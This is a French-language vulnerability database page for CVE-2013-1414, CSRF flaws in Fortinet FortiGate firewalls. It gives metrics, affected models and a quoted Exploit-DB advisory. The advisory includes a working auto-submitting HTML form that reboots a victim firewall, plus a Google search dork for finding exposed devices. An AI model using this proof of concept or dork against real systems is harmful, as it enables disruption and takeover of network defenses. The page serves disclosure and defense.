CVE-2013-1414 : Détail

CVE-2013-1414

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
0.23%V4
Network
2013-07-08
17h00 +00:00
2024-09-16
20h16 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 26528

Date de publication : 2013-06-30 22h00 +00:00
Auteur : Sven Wurth
EDB Vérifié : No

Vulnerability ID: CVE-2013-1414 Vulnerability Type: CSRF (Cross-Site Request Forgery) Product: All Fortigate Firewalls Vendor: Fortinet http://www.fortinet.com Vulnerable Version: < 4.3.13 & < 5.0.2 Description ========== Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall. Requirements =========== An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. Report-Timeline: ================ Vendor Notification: 11 July 2012 Vendor released version 5.0.2 / 18 March 2013 Vendor released version 4.3.13 / 29 April 2013 Status: Fixed Google Dork: ========== -english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser" Credit: ===== Sven Wurth dos@net-war.de PoC ==== This Example will reboot a Fortinet Firewall. This is just one of many possibilities to attack this vulnerability. ##### CSRF - Proof Of Concept #### <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post"> <input type="hidden" name="reason" value=""> <input type="hidden" name="action" value="1"> <input type="submit" name="add" value="rebootme"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> ##### End Poc #####

Products Mentioned

Configuraton 0

Fortinet>>Fortios >> Version To (including) 4.3.12

Fortinet>>Fortios >> Version 4.3.10

Fortinet>>Fortios >> Version 5.0

Fortinet>>Fortios >> Version 5.0.1

Fortinet>>Fortigate-1000c >> Version -

Fortinet>>Fortigate-100d >> Version -

Fortinet>>Fortigate-110c >> Version -

Fortinet>>Fortigate-1240b >> Version -

Fortinet>>Fortigate-200b >> Version -

Fortinet>>Fortigate-20c >> Version -

Fortinet>>Fortigate-300c >> Version -

Fortinet>>Fortigate-3040b >> Version -

Fortinet>>Fortigate-310b >> Version -

Fortinet>>Fortigate-311b >> Version -

Fortinet>>Fortigate-3140b >> Version -

Fortinet>>Fortigate-3240c >> Version -

Fortinet>>Fortigate-3810a >> Version -

Fortinet>>Fortigate-3950b >> Version -

Fortinet>>Fortigate-40c >> Version -

Fortinet>>Fortigate-5001a-sw >> Version -

Fortinet>>Fortigate-5001b >> Version -

Fortinet>>Fortigate-5020 >> Version -

Fortinet>>Fortigate-5060 >> Version -

Fortinet>>Fortigate-50b >> Version -

Fortinet>>Fortigate-5101c >> Version -

Fortinet>>Fortigate-5140b >> Version -

Fortinet>>Fortigate-600c >> Version -

Fortinet>>Fortigate-60c >> Version -

Fortinet>>Fortigate-620b >> Version -

Fortinet>>Fortigate-800c >> Version -

Fortinet>>Fortigate-80c >> Version -

Fortinet>>Fortigate-voice-80c >> Version -

Fortinet>>Fortigaterugged-100c >> Version -

Références

http://www.exploit-db.com/exploits/26528/
Tags : exploit, x_refsource_EXPLOIT-DB